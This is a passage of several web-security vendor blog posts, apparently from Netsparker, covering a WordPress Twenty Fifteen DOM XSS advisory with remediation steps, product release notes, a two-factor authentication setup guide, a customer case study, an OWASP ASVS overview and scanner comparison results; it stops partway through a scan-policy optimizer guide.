Today we published advisory CVE-2015-3429 about a DOM based cross-site scripting vulnerability in the default WordPress theme Twenty Fifteen. This WordPress theme has been included by default in WordPress since version 4.1, which was released on the 18^th of December 2014.

Millions of WordPress Websites Vulnerable to DOM XSS

Since the Twenty Fifteen theme is included by default in WordPress, many WordPress users do not delete it from their installation even when they use another theme. Even though the theme is not activated, the vulnerable files can still be accessed by attackers, thus rendering such sites vulnerable to DOM XSS. When you consider that WordPress powers around 20% of the websites on the internet, there could be millions of WordPress websites vulnerable to this DOM XSS vulnerability.

How Are DOM XSS Vulnerabilities Typically exploited?

To exploit a DOM based cross-site scripting vulnerability such as this one, after identifying a vulnerable website the attacker sends an email to the website users with a link that will exploit the vulnerability and triggers a script that steals the users’ cookie. Instead of an email the attacker can also post a comment on the website itself with the malicious link.

To encourage users to click the link attackers typically send legit like emails where they advise the users to click on the link to update their profile, or to change their password etc. Even though the link is malicious, it still points to the legit website's domain hence typically users, even administrators sometimes fall for such type of tricks and click on the link.

Once a user clicks on the link and the attacker gets hold of the users’ cookie, the attacker can easily input the cookie in his browser to emulate the users’ session. Should the victim be the WordPress administrator, the attacker gains administrative privileges on the target and vulnerable website. Typically at this stage the attacker creates another user with administrator privileges to retain access to the vulnerable website and operate unnoticed. For more detailed and technical information on this vulnerability read our article DOM based cross-site scripting vulnerability.

How to Fix this WordPress DOM XSS?

WordPress just announced WordPress 4.2.2, a security and maintenance fix that addresses this and other issues. If you have automatic updates enabled most probably your WordPress websites have been updated. Alternatively, if you do not want to update your WordPress to 4.2.2, which is not recommended you can:

a) update the theme Twenty Fifteen only, or if you are not using it simply uninstall it from your WordPress website or

b) delete the vulnerable file example.html which can be found in the following WordPress directory /wp-content/themes/twentyfifteen/genericons/example.html

Today we are announcing the release of Netsparker Desktop 4.1. This new version includes a number of new web application security checks and improvements, as explained below.

Web Form Hijacking Security Check

Web form hijacking is the exploitation of a vulnerable form that allows the attacker to steal the content of a form. For a successful attack the attacker leads the victim to access and populate the form using a specially crafted URL that exploits the vulnerability. Once exploited the form POST data will go to the attacker’s controlled server, thus allowing him to access such data.

Base Tag Hijacking Web Security Check

When a web application is vulnerable to base tag hijacking attackers are able to control the src attribute of a base tag in HTML. This means that the attackers can load images, JavaScripts and other types of scripts from a domain they control and have them executed on the context of the page. This vulnerability’s impact is almost the same as that of a cross-site scripting vulnerability.

Other Major Improvements

Detection of Backup Files on Websites

In this version we also improved the scanner’s detection of backup files on websites. As such backup files do not have a direct impact on the security of a website, as in they are not like a SQL Injection vulnerability that if exploited it allows the attacker to access the backend database. Though if discovered, some of them might have some information that can help attackers better craft their attack. So it is all good to know about them as well.

Configuration of Backup Files Signatures

We also moved the Backup Files signatures in the Scan Policy Editor, thus allowing users to modify the list of signatures and easily add their own signatures as well as shown in the below screenshot.

Detection of Common Directories on Websites

Similar to backup files, common directories do not have a direct impact on the security of a website though they can definitely ease an attacker’s job. For example an attacker would give more attention to a directory called /admin/ rather than a directory called /samples/.

Netsparker 4.1 ChangeLog

The above are just the major highlights for this version of Netsparker. For a complete list of all that has been improved and fixed refer to the Netsparker Desktop changelog.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop up window with the upgrade details will pop up the next time you run Netsparker. Alternatively you can always click Check for Updates from the Help drop down menu to force manual updates.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.

We are pleased to announce the appointment of Strong Crypto Innovations as Netsparker Desktop and Netsparker Cloud reseller in the US. Strong Crypto Innovations is based in Virginia and has been providing security services and solutions to organizations since 2006.

Integrating Automated Web Application Security Scanning in the SDLC

Strong Crypto Innovations are committed to continuing helping organizations integrate automated web application security scanning in their SDLC, which process has become really easy with the fully blown API of Netsparker Cloud, Netsparker’s latest enterprise level online service offering.

“Offering Netsparker Cloud provides Strong Crypto’s customers with the tools to strengthen their web application security programs in a long-term and sustained way,” said Alexander J. Fry, President at Strong Crypto Innovations. “With Netsparker Cloud, our customers can quickly and easily implement a continuous monitoring program as well as address FISMA and PCI compliance requirements.”

The Netsparker Cloud online service also complements Strong Crypto’s business model and the penetration testing services they provide to their customers. Strong Crypto Innovations are also using the Netsparker false positive free scanning technology to provide web application security services to those organizations which do not have such operations in-house.

For more information about Strong Crypto Innovations visit https://www.strongcrypto.com/. Contact us if you would like to start reselling Netsparker web application security scanners in your country.

When we started Netsparker we released Netsparker Community Edition, a free SQL Injection scanner. I am sure many of you are familiar with it as till this day it is generating thousands of downloads each month.

There were several reasons why back then we released Netsparker Community Edition, but mainly as the name implies it was to help the community and to help us grow and learn about the industry.

Helping the Community

Till this day many businesses and organizations are not yet aware of the need to secure their websites and web applications, or of the impact a hacked website can have on their business and its reputation. And since Netsparker CE was a free SQL Injection scanner many downloaded it and started using it, thus helping thousands of businesses identify SQL Injection vulnerabilities in their websites and fix them.

Learning About the Industry

Even though most of our management team have years of experience in the security and software industry, like every other startup we still needed to learn as much as possible about the industry of automated web vulnerability scanning. And Netsparker Community Edition helped us learn a lot. In fact we are really grateful to anyone who used it and sent us feedback.

Time to Move On

As a company our aim was always to develop a product that any business or organization can use to ensure the security of their websites, irrelevant if they have a dedicated security team or not, or if the users are seasoned security professionals or not. And till this day we are happy to say that we achieved all of this. As a matter of fact even though Netsparker is just six years old, and is the youngest company in this industry we are already rated as one of the top players in the industry.

A few months back we launched the only false positive free online web application security scanner, Netsparker Cloud. It is our enterprise online service offering and like any other new product, there is a lot of hard work that needs to be done. So to ensure the quality our products Netsparker Desktop and Netsparker Cloud we decided to terminate Netsparker Community Edition and focus all the resources on them.

Thank You

So far the Netsparker adventure has been a great ride and without Netsparker Community Edition it would have been different, and maybe not as successful as this one. Thanks to the feedback we were able to get we’ve built the best automated web scanning engines available on the market and want to continue building on the existing success. We are also very happy that Netsparker helped many businesses get started with web application security and hopefully create a safer and more secure internet.

I’d like to personally thank every one of you who gave us feedback and was involved in this adventure, and encourage every Netsparker Community Edition user to switch to Netsparker Desktop or Netsparker Cloud. After all, web application security is not just about SQL Injections. Feel free to get in touch with us with any queries you might have and happy scans!

A few days back our CEO and Product Architect Ferruh Mavituna was interviewed by Paul Asadoorian from Security Weekly, a popular podcast that provides free content within the subject matter of IT security news, vulnerabilities, hacking, and research.

During the thirty minutes interview, Ferruh explains how he got started with web application security and talks about several other web application security related subjects such as the effectiveness of web application firewalls, the importance of automating the detection of vulnerabilities in web applications, how organizations and large enterprises can leverage security tools such as Netsparker Cloud to ensure the security of their web applications and why security tools need to be easy to use.

Ferruh also explains why in Netsparker Cloud, Netsparker's online web application security scanner there is a lot of focus on the workflow that happens once a vulnerability is discovered, how the Netsparker team researches new vulnerabilities and security issues, and Netsparker’s bold claim; false positive free web vulnerability scanning technology.

Netsparker are happy to announce the sponsorship of PHPKonf 2015, a conference for PHP developers that will be held between the 25th and 27th of July at Bahcesehir University, Istanbul. PHPKonf is hosted by the Istanbul PHP Community (IstanbulPHP) and will have 27 talks delivered by some of the best PHP speakers from companies such as Zend, Symfony, Sensio Labs and Microsoft.

Visit the Netsparker Booth for Free Online Web Application Security Scans

We, Netsparker, will also have a booth where we will be exhibiting Netsparker Desktop and Netsparker Cloud, the only false positive free web application security scanners on the market. Come and say hello and collect some of our cool swag.

We will be also giving away one month of free online web application security scans for one website to anyone who is interested in Netsparker Cloud, so pass by our booth if you would like to have your website scanned with Netsparker Cloud.

We look forward to seeing you there!

We are happy to announce that we are giving free online web application security scans to all developers of open source web applications, with absolutely no strings attached, via a free Netsparker Cloud account. Netsparker Cloud is the only false positive free online web application security scanner.

At Netsparker we appreciate how much we have benefited from the open source community and we would like to give something back, and to also ensure more secure development of open source web applications for the future. If you are an individual (genius) developer, or work with a team of (genius) developers and would like to get your free online web application security scans, send us an email on info@netsparker.com, tell us which open source project you are working on and the URL and we will get you started immediately.

Testing the Web Vulnerability Scanners with Open Source Applications

The secret of our state-of-the-art scanning engine’s vulnerability detection capabilities is simple; substantial amounts of research and even more testing. Testing is the utmost priority to Netsparker as our end user will use our desktop and online web application security scanners to scan a multitude of web applications that can each use a wide range of technology to power them.

To help us get a good overview of what web applications our users will scan, we built a near real live test lab with open source web applications which we constantly scan, test and refine, test and then test some more.

The rationale for all this scanning and testing is that a big chunk of the websites and web applications we access every day, be it for leisure or for business are powered by open source web applications such as WordPress, Joomla!, Drupal, miniBB, Twiki and many others. The reason why they are so popular is because they are available for free and typically they lead the industry in terms of innovation and features.

The downside to these open source web applications is that they can be vulnerable to malicious attack, due to lack of security testing. Netsparker knows this first hand as a result of our ongoing testing of all type of web applications. As part of this ongoing testing, Netsparker have identified a significant number of vulnerabilities in open source web applications, and we recently published an infographic that highlights the vulnerabilities we found in open source web applications. Earlier on this year we also published a report that summarizes the type of vulnerabilities we covered in our advisories.

Giving Back to the Open Source Community

The fact is that without open source web applications the whole process would have been more difficult, costly and time consuming. We also know that ‘free’ does not pay the bills, or even get you a slice of pizza, and most open source web applications are just side projects for many developers. Most of the time they do not have the budget to buy security tools to help them build more secure web applications.

We at Netsparker appreciate how much we have benefited from the open source community and we would like to give something back. We also want to ensure more secure development of open source web applications in the future.

Open Source Developer? Apply For Free Netsparker Cloud Scans

So, as a big ‘Thank you’ to all the open source developers, we will be giving away free Online web application security scans to developers of open source web applications. This will allow them to automatically scan their web application for vulnerabilities and security flaws. No surprises, no hidden costs, no strings attached! If you are a developer of an open source web application project just send us an email on info@netsparker.com and let us know which open source project you are working on.

We are more than happy to help you get started and to also give you some tips on how to get the best out of our online web application security scanner. Netsparker Cloud is a multi user platform with a web application vulnerability management system, so if you are a team you can collaborate together and ensure all vulnerabilities in your web applications are solved before you release your next update, thus gaining more trust from your users.

Netsparker Cloud users can enable two-factor authentication, or as also known two-step verification to add an extra layer of security to their Netsparker Cloud account. When you enable two-factor authentication, when logging in to Netsparker Cloud you will be asked for your password and a one-time code. Configuring it is very easy, as I will explain in this article.

Enable Two-factor Authentication on Netsparker Cloud

1. Login to your Netsparker Cloud account
2. Click on the Security node under Your Account menu entry and click on Enable two-factor Authentication.

3. Install a two-factor authentication app on your phone. A popular choice is Google Authenticator and you can download it from Google Play or Appstore.
4. Once you install the app on your phone launch it and scan the QR Code displayed on your Netsparker Cloud dashboard, as highlighted below.

5. Once scanned the mobile app should add a Netsparker Cloud verification code entry as seen in the below screenshot (the screenshot was taken using the Google Authenticator app).

7. Enter your Netsparker Cloud password in the Current Password input field and the 6 digit code showing on your mobile app in the input field underneath.
8. Click Configure to finalize the setup.

The next time you login to Netsparker Cloud you will be asked for your email and password as per usual, and then you will be asked for the one time code from your mobile app. Should you not be able to access the mobile app during login use one of the recovery codes as explained in the following section.

Recovery Codes for Netsparker Cloud Two-factor Authentication

Once you setup two-factor authentication in Netsparker Cloud, the service will generate ten recovery codes as highlighted in the below screenshot.

Copy the recovery codes and keep them in a secure place where only you and other trusted users can access. Recovery codes are only needed when you need to login and do not have access to the two-factor authentication mobile app to generate a one time code.

Using the Recovery Codes

If you need to login to Netsparker Cloud and you do not have access to the mobile app to generate a one time code, enter your email and password and when asked for the one time code specify one of the recovery codes.

A recovery code can only be used once and should you use all recovery codes disable and enable two-factor authentication again to regenerate new recovery codes.

Today we are happy to announce an important update to our Netsparker Cloud product. From today, all Netsparker Cloud users can enable two-factor authentication to add an extra layer of security to their Netsparker Cloud account. We have also included some additional improvements in this update which are outlined in this post below.

Two-Factor Authentication in Netsparker Cloud

Your Netsparker Cloud account contains sensitive information about your websites and web applications, e.g. a ‘to do’ list of vulnerabilities that could still be exploited, etc. This is exactly the type of information that you do not want to end up in the wrong hands, therefore, ensuring the security of your sensitive data in Netsparker Cloud account is a top priority.

We added two-factor authentication support in Netsparker Cloud to help you further protect your information. Therefore incase your password is ever stolen or guessed, the attacker still cannot get access to your sensitive data as they will also need a one-time code. This one-time code is only generated via an application running on your mobile device. Follow our guide to setup two-factor authentication on Netsparker Cloud.

Other Netsparker Cloud Improvements

Ability to resend invitation emails: We added a button next to each invited user in the Netsparker Cloud dashboard so the account administrator can resend the invitation email should the user fail to received the first invitation email.

Permissions to Change Scan Policies: Users who need to make changes to Netsparker Cloud Scan Policies, such as adding a new one, or modifying an existing one, now need to have Start Scans permission to be able to do so.

Scheduled Scans: We have restructured the components that Netsparker Cloud uses to schedule web security scans to make it a more efficient & stable system.

Moving Forward, More Updates To Netsparker Cloud

As Netsparker Cloud is an online service, we work in a fast dynamic environment and as such we frequently add new functionality, new web security checks and fix bugs, the majority of which are transparent to you. For example, along with our regular improvements that we implemented in Netsparker Cloud since its launch, based on customer feedback we also added a new functionality to allow users to generate PDF and HTML reports.

Thank you for your time and stay tuned with us by following our blog or any of our social media channels to keep yourself up to date with what is new and improved in Netsparker Cloud, the only false positive free online web application security scanner.

“As we are faced with perpetual evolving security threats and vulnerabilities, Netsparker brings a level of assurance to our business as it is included as part of our development lifecycle to help identify and mitigate such threats prior to deployment. With Netsparker being able to provide zero false-positives, it ensures that time is not wasted deciphering whether a vulnerability is legitimate or not.” - Chris Evans, Security and Compliance Manager, ISACA.

ISACA is an independent and non-profit global association that is focused on the development and adoption of industry-leading best practices for information systems, IT governance and IT security. It serves more than 140,000 members and professionals who hold ISACA certifications in more than 180 countries; most of which are security consultants, professionals, and educators.

The Risks and Repercussions of Getting Hacked

As an international association which advocates IT governance and security best practices to all its members, ISACA is considered a leader in a community of IT security experts. Therefore, as part of their security practice, a top priority is placed on all of their websites & portals to ensure they are constantly monitored for security threats & vulnerabilities that could happen at any time.

If any of ISACA’s website's succumbed to a security breach, it could potentially lead to the loss of private user information and data or the potential loss of control over the affected website. Any access to important user data from an unauthorized user or having an unusable website would result in a negative impact to the association’s reputation as the arbiter of IT governance & security practices and a significant public relation crisis.

As the leaders in advocating security, compliance and IT governance best practices by delivering courses and training about these subjects, suffering any security breach is simply not acceptable.

The Web Application Security Challenge

As an international organisation, ISACA not only hosts their main website but also host and maintain several other related websites, which contains multiple login forms, user registration areas, online payment capabilities, different user portals and tens of thousands of pages. The auditing of, and ensuring the security of such a large portfolio of international websites is not a simple task.

In adherence to their own best practices for security, ISACA has a staging environment where all code is thoroughly tested before being transferred to live environments. However, despite these security protocols, ISACA’s own security department still faced a large operational task. That task was to maintain the integrity of all their sites, despite frequently being changed and updated to address the business needs and services provided by individual websites within their portfolio. This, of course, presents a major challenge for all international businesses and ISACA was no different.

The previous solution they used to deal with this issue was to use open source tools and rely on third party consultants. Unfortunately, most of the tools they used only provided high level details around the issues and were relatively unreliable. Highly trained consultants are, by their nature, very expensive, and it is virtually impossible for consultants to audit all possible attack surfaces on all of their websites, 24/7. Therefore, they were in urgent need of an alternative solution. Ideally, this alternative solution should be one that automated the process of identifying vulnerabilities and security issues and could be used across multiple websites, simultaneously.

The Solution: Automating Web Application Security

As part of their due diligence process, ISACA’s security team tested several tools before choosing Netsparker Web Application Security Scanner. The main reasons for choosing Netsparker over the rest were:

• It clearly defines and explains imminent vulnerabilities;
• It assists in vulnerability assessments during different development stages;
• It has a facility to customize, scan and automate tasks;
• It is easy to use.

Feedback from the senior management of the ISACA security team demonstrated that: “Netsparker was able to further define and explain the specific issues at hand. It was also able to assist in the proof of concept for vulnerability assessments during development.”

“It is very easy to use, thus allowed everyone in our team to cooperate. Of course, the ability to customize, scan, and automate the tasks was a big plus. Netsparker helped us identify the areas to remediate before we migrated new code into the production environment.”

For over 3 years, Netsparker has been an integral part of ISACA’s development life cycle and has been used to scan website changes and new web applications, both on their staging server and development environment.

Staying on Top of the Web Application Security Game

Identifying vulnerabilities is one thing; continuously developing secure code and staying on top of the game throughout the years is another.

A company or organization may have access to the best tools in the world, but these are useless unless such tools are backed by professional and trustworthy support that can be relied on unconditionally. Top-notch support is precisely what ISACA was looking for in the first place: not just a product, but a partner to help them when they end up with their backs against the wall.

Like everyone else in this industry, ISACA’s security experts have had their share of challenges when securing web applications, but they have found the help they needed every single time. “Netsparker support has been engaged, they are very detailed and thorough. I am completely satisfied when speaking to Support on any issue or question that we have had,” Evans concluded.

About ISACA

As an independent, non-profit, global association, ISACA engages in the development, adoption and use of globally accepted, industry-leading knowledge and practices for information systems. Previously known as the Information Systems Audit and Control Association, ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.

About Netsparker Web Application Security Scanner

Netsparker Web Application Security Scanner is an industry leading automated web application security scanner developed by Netsparker Ltd. Netsparker management and engineers have more than a decade of experience in the web application security industry that is reflected in their products. Netsparker is a very easy to use web application security scanner that automates most of the web application security scanning. An out of the box installation of Netsparker is able to scan a wide variety of web applications, therefore web security experts, penetration testers and QA engineers do not need to spend countless amount of hours tweaking and configuring the software. Netsparker is revolutionising web application security by being the only web application security scanner to automatically verify detected web vulnerabilities, thus reporting no false positives. Netsparker is used by world renowned companies such as Samsung, NASA, Skype, ING, ISACA and Ernst & Young.

What is OWASP?

In December 2001, the Open Web Application Security Project (OWASP) was established as an international not-for-profit organization aimed at web security discussions and enhancements. For practically their entire existence, OWASP has kept track of perhaps every type of hack that could be done. Everything from social engineering, poor authentication systems cross-site scripting, DOM XSS, SQL injection, general software vulnerabilities, and more. Basically OWASP kept track and encouraged the web community to continually secure everything as best as possible.

OWASP’s mission has always been to encourage the best security practices by not only highlighting the most exploited and critical vulnerabilities but also acting as leadership in the security community to ensure education and understanding reach as many administrators as possible. Since 1999, the Common Vulnerabilities and Exposures (CVE) dictionary has existed to keep track of and alerts consumers and developers alike of known software vulnerabilities.

OWASP has kept itself mostly focused on keeping record of the most common CVEs during its tenure, and usually its suggestions focused on understanding the vulnerabilities by general categorization. Now, after an initial attempt in 2009 and reviewing industry feedback, OWASP is focusing on a strictly defined standardization to help prevent CVEs in the first place.

Standardizing Security’s More Dynamic Side

When dealing with web application security, there exists a trifecta of three main areas of entry that are most commonly exploited by hackers:

• the people that hold privileged access to the application;
• the services that support the application;
• the functions of the application itself.

Privileged access is valued the most, especially when going for high-value targets and not just trying to blindly run a few scripts against a website. There exists a critical amount of social engineering in all of the biggest hacks in the past few years. In fact, even the most prestigious security researchers themselves are not immune from such techniques.

Kaspersky Lab, a prominent figure in the security industry famous for uncovering nation-state attacks such as Stuxnet, recently found itself the target of just such an incredibly detailed and intricate precision spear phishing attack not seen outside of clandestine cyber warfare against Iran and other nations. Services are also high-value targets, especially as of recently. The infamous HEARTBLEED and Shellshock vulnerabilities were not part of the most popular categories in OWASP top 10 list, but that did not stop them from quickly becoming among the most critical of the past decade.

The services that support a web application find themselves usually in one of two categories when it comes to attacks: a specific vulnerability exploited with precise focus, such as a 0day, or a broad vulnerability attacking a major weakness, such as a distributed denial-of-service attack. Typically, most service-based attacks fall in the latter category, but recently precision attacks have been making headlines, namely due to their widespread effect because of the ubiquity of the software being used.

However, the functions of the web application itself fall into the most commonly exploited categories year after year. For over a decade, the SQL injection vulnerability remained at the top of OWASP’s top 10 list of vulnerabilities, with over 6,500 major, widespread vulnerabilities in 15 years affecting both open- and closed-source software. The difficulty in preventing these kinds of attacks stems from the fact that the web application itself is highly dynamic, thus no easy “apply this patch” sort of fix exists. It is through the Application Security Verification Standard (ASVS) that OWASP intends to provide focus to development’s dynamic by providing strict and explicitly defined security guidelines.

How Netsparker Can Help in Writing More Secure Web Applications

Typically a web application security scanner is applied after the fact, when the development of the web application has mostly been done already. Yet development, at the time of writing the code itself, can benefit from a web scanner as well. In good coding practice, unit tests are employed in all major functional areas of software. Here, too, a scanner can be used effectively as another level of unit testing.

From the screenshot above you can already see how Netsparker can provide a thorough assessment of not only particular vulnerabilities, but how they are classified by various existing definitions and standards, such as PCI compliance and OWASP vulnerability classifications.

This is indeed a highly useful tool when investigating a web application, however it is usually applied after the application is mostly developed, as we mentioned earlier.

Introducing Security During the Early Stages of Web Application Development

In fact, major organizations like Microsoft encourage the practice of running security analysis synchronously with development -- known as a Security Development Lifecycle. Netsparker Cloud even has an API system that could be triggered from continual build systems, like Atlassian Bamboo or Jenkins, to provide real-time and automated web application security audits. These assessments and classifications can be equally, if not more so useful during the development stage, as they save time, money, and potential major headaches.

Introduction to OWASP ASVS

The OWASP ASVS standard has various levels of classification, ranged 0 through 3, starting a cursory verification (preliminary scans, for example) all the way through advanced where the application is secured against all known and potential threats. By definition, the zeroth classification is intended by OWASP to be where scanners are utilized, but Netsparker provides opportunity to reach all the way to the extended areas of advanced classification, too. This is because of Netsparker’s in-depth heuristics, advanced scanning features including authentication and user input, and especially its incredible flexibility to be fine-tuned for specifics that are unique to each application.

In the OWASP ASVS standard, there exist various verification requirement categories, such as V2 - Authentication, V3 - Session Management, and so forth. Within these categories are specific requirements that must be met in order to satisfy various classification levels. For example, in the V2 - Authentication requirement category, V2.6 requires developers “[v]erify all authentication controls fail securely to ensure attackers cannot log in” in order to meet at least level 1 “Opportunistic” certification. Netsparker can go beyond the level 0 cursory scanning, helping to meet even level 3 “Advanced” certification by assisting a development team in testing and validating their application, in this instance by testing to validate the V2.6 requirement.

Other categories can find much benefit in the Netsparker web security scanner, too. The V5 requirement category – “Malicious Input Handling” – is one of many categories where Netsparker can particularly excel. V5.10, for example, requires developers “[v]erify that the runtime environment is not susceptible to SQL Injection, or that security controls prevent SQL Injection” – an area Netsparker checks thoroughly. In fact, Netsparker is capable of identifying over 200 kinds of vulnerabilities, far exceeding the number of vulnerabilities to secure against to meet ASVS level 3 certification.

Utilize Tools to Comply with OWASP ASVS

A web scanner need not be limited to only finding after-the-fact vulnerabilities. Properly utilized, Netsparker can help a development team satisfy even the most advanced requirements of the OWASP Application Security Verification Standard, in almost every category. With a good set of tools and a clever use thereof, being ASVS certified is as simple aspoint and click.

Many have the impression that security software is difficult to use and should be left to only the highly trained experts. If you do a quick review of most of the automated web application security scanners available on the market today you will notice that many have an abundance of options and settings to ensure it can be used in every type of edge case and scenario.

Even though these options might come in handy to 1% of the users, they are confusing the typical user and result in non-use, or incorrect use and spurious results. Many software vendors have had to introduce certification programs for their software, as they know that training is required for users to use their software correctly & efficiently. This results in an increase of overall costs via continuous staff training to keep them qualified just to use a tool that is supposed to improve automation and reduce time & money.

Web application security is a highly emotive subject that can keep many developers and admin staff awake at night, but why make it hard to implement? According to recent reports the current paucity of security on most websites and web applications is not a lack of tools or awareness of security threats, but organizations not using the available tools they have at their disposal. However organizations cannot be blamed if they are not using software that is difficult to use, or professional certification is required to use it. This non-use of security software leads to a waste of resources, false alarms and vulnerable web applications, to say the very least.

Organizations do not need software vendors who try to upsell them products that will require more investment and not give them what they actually need. They need a reliable solution. They need an easy to use web vulnerability scanner that will automatically identify vulnerabilities and security in their web applications. A scanner that their staff can use without any training and get results that they can take action on immediately.  

Developing an Easy to Use Web Application Security Scanner

Netsparker is brave & bold company, we thrive on defying the norm. When Netsparker was founded we created quite a stir in the industry with the bold claim of false positive free web security scans. The ‘norm’ before Netsparker was around was ‘It is better to have an extra false positive vulnerability to verify than a false negative!’

Over the years we proved that such a compromise is not necessary and you can have the best of the both worlds. With the built-in exploitation engine of Netsparker you can have results with confirmed web vulnerabilities and findings that are clearly marked as possible issues, thus avoiding all the possible negative impacts false positives have on web application security scans.

And now we are looking forward at defying the norm and raising the bar again in the web application security industry. We are completely focused on developing an even easier to use web application security scanner. By easy to use we do not just mean a very attractive & ergonomic user interface with lots of wizards, we also mean that we should help you automate most practically all of the pre- and post-scan tasks. As the research has clearly pointed out: the easier a security tool is to use, the better the adoption rate is amongst organizations, thus making the web a safer place for everyone.

Benefits of Easy to Use Web Application Security Scanner

Improve Productivity and Reduce Costs of Web Application Security

Clearly, this is the most obvious benefit of all; easy to use software costs much less to run and helps improve productivity. Users do not need to be trained or certified and they do not require extensive amounts of time to try and figure out how the tool works. Another great benefit of having an easy to use web application security scanner is that the scanning tasks can be assigned to someone who’s role is less technical and in a lower pay grade than a developer, therefore allowing you to let the developers focus on what they do best; write code and fix any reported security issues.

Let’s take a look at a practical example; configuring URL rewrite rules in a web application security scanner. Have you ever tried to configure URL rewrite rules in any other scanner apart from Netsparker Desktop or Netsparker Cloud? You need to have access to the web server configuration and analyze the configuration. You also need to know how to write regular expressions. Let’s face it, even though regular expressions are not rocket science, unless you are developer or use them on a daily basis writing them can be quite a time consuming process, if not frustrating.

In today’s fast paced world, the user does not need to know about the in and outs of a website or web application to detect vulnerabilities and security issues in it. Nor do they need to know how to write regular expressions or have access to the web server configuration, which might lead to other security issues. Configuring URL rewrite rules should be simple; specify the URL & the parameters and let the scanner automate the URL rewrite configuration for you, as it is in Netsparker.

But we at Netsparker are not settling for just this. We love a new challenge and we are going a step further. Currently, we are working on a new feature for both Netsparker Desktop and our online web application security scanner Netsparker Cloud that will automatically detect URL Rewrite rules for crawling and attacking purposes. Therefore there is nothing that the user needs to do. Of course we will still allow the geeky users to configure their own rules should they want to, but we are further simplifying the process without losing any of the product's capabilities.

More Accurate Web Vulnerability Scans and More Secure Websites and Web Applications

Garbage in, garbage out. If you are not familiar with this term, it means that if you feed garbage to a computer it will produce garbage since it operates by logical processes. The same applies to a web application security scanner. If it is difficult to configure, users will not configure it correctly and it will produce incorrect scan results. This means it will fail to scan the website properly, report a lot of false positives and miss genuine vulnerabilities.

Web Application Security Automation Made Easy

Automation and easy to use security software is definitely the way forward if we would like to see more organizations adopt our solutions and develop more secure websites and web applications. As we have clearly shown, there is no need to limit any of the product’s capabilities in order to deliver user friendly product. In fact both the desktop and online edition of our automated web application security scanners are fully blown scanners and every automated process can be overridden and configured manually. However, we have found that only the minority need such fully configurable scanners and we are happy to cater for them. Though the generic user base needs easy to use tools. After all they want to scan web applications and identify vulnerabilities and not fly rockets to the moon, unless of course they work for NASA, in which case, Cool!

Prospects frequently ask us how do Netsparker web application security scanners compare to other competitor scanners. This type of due diligence is part of any procurement or investment in new, or additional technology. I wouldn’t fork out a few thousands without doing my homework.

There are many factors you should look into when comparing automated web security tools as explained in How to evaluate web application security scanners, but I won’t go into all of that. In this post I will look specifically into the scanning engine’s capability, which is the most important component of the scanner. If that does not work properly, then all the other frills are worthless.

2013 and 2014 Web Security Scanners Comparison

Looking back at the independent web application security scanner comparison done by Shay Chen (@sectooladdict) in 2013 and 2014, Netsparker outperformed all competitors, except one, to take overall second place. We would have taken first place, and equalled the performance of a scanner that costs at least three times as much if it wasn’t for a weird bug which we fixed within a few minutes. Tough luck? Not much. Motivated? Yes. Such results motivates us to work even harder and continue improving both the desktop and the online web application security scanner and keeps us striving to be number one.

How Does Netsparker Scanners Compare with Other Scanners in 2015?

A few weeks back Shay Chen updated the results using the latest version of the Netsparker scanning engine, which is used in both Netsparker Cloud and Netsparker Desktop web security scanner. Below are the results:

Direct Impact Vulnerabilities

Netsparker detected all the SQL Injections, reflected Cross-site Scripting, Local File Inclusions and Remote File Inclusions vulnerabilities without reporting any false positives. These vulnerabilities are all direct impact vulnerabilities and are the most commonly exploited ones during an attack.

Old Backup Files Detection - Non Direct Impact Vulnerability

We also improved the backup files detection rate of the Netsparker scanners. Last year Acunetix led this security check with 32.61% and this year we identified 72.83%. Pretty good job there!

Why Netsparker Focuses More on Direct Impact Vulnerabilities?

After the web application security scanners comparison of 2014, we continued working on improving the scanning engine. These improvements always focus more on direct impact vulnerabilities such as Cross-site scripting, SQL Injection, DOM XSS etc.

The reason behind such decision is very simple; if malicious hackers identify a direct impact vulnerability on your web application they can exploit it within minutes, which leads to a hacked website, loss of records, tampering of data etc. For example by exploiting a SQL injection vulnerability malicious attackers can gain unauthorized access to the web application’s database which typically contains sensitive information about your business and customers. They can also tamper or delete such data. In case of a cross-site scripting vulnerability, the attackers can hijack your users’ session, where typically the administrator is targeted.

On the other hand, even though old backup files can contain juicy information for attackers, most of the time they do not contain enough information to craft an attack. Also, such type of files can be easily identified during a quick manual analysis. For example if you do a recursive file and directory listing of your web application you can easily spot such files within a minute or so.

We are not saying these type of possible security flaws are of less importance and less of a focus for Netsparker. On the contrary, we in fact outperformed any other scanner in 2014 when measured against this performance metric and Netsparker detects a wide range of web application vulnerabilities. However, our main focus will always be to help users identify all sort of direct impact web application vulnerabilities, those which are very difficult to find manually, or those that are time consuming.

How Useful Are Web Security Scanner Comparisons?

At Netsparker we always say that the best way to test a web application security scanner is to scan a staging copy of your web applications as explained in How to evaluate web application security scanners. It is important to scan a staging copy of your own web applications because each web application has individual characteristics, therefore each scanner can report different results. Every developer has his own way of writing code and every administrator has his own way of configuring servers and web applications, so nothing beats a scan of your own web applications.

Though because it is virtually impossible to test all scanners available in the market today, these comparisons are incredibly useful and highlight who are the market leaders, the scanners that can detect the most vulnerabilities. And when looking for a scanner that is what you are looking for, automating the process of identifying all possible web application vulnerabilities. Therefore if you would like to test web application security scanners, or as they are also called web vulnerability scanners choose the top three from such lists and get your hands dirty.

We have been working on the upcoming versions of Netsparker Desktop and Netsparker Cloud web application security scanners for some time now, and finally, the new features are taking shape. One of the new features I’d like to speak to you about today is the Scan Policy Optimizer.

What is the Scan Policy Optimizer?

The Scan Policy Optimizer is a wizard based optimizer that allows you optimize Netsparker’s scan policies automatically.

Why Optimize Web Security Scan Policies?

Most modern custom built web applications are quite extensive in terms of functionality, so it can take an automated web application security scanner a considerable amount of time to scan them. There are many things you can do as a user to reduce the duration of an automated web security scan, such as optimizing the web scanner’s scan policy.

Automated Optimization of Web Security Scan Policies

Even though optimized scan policies mean more efficient and speedy web security scans, many of us do not have the time to go through all the checks and determine which ones should be enabled or not during a specific scan, or we are too lazy to do it. So our automation obsessed gurus thought of automating most of the process via a simple wizard. Below you can find the procedures on how to

• optimize scan policies in Netsparker Desktop
• optimize scan policies in Netsparker Cloud

How to Optimize Scan Policies in Netsparker Desktop

1. Launch the Scan Optimizer Wizard

You can launch the Scan Policy Optimizer wizard by clicking the magic wand button next to the Scan Policy drop down menu in the Start a New Scan dialog. You can also launch the Scan Policy Optimizer from the Scan Policy Editor.

2. Select Operating System

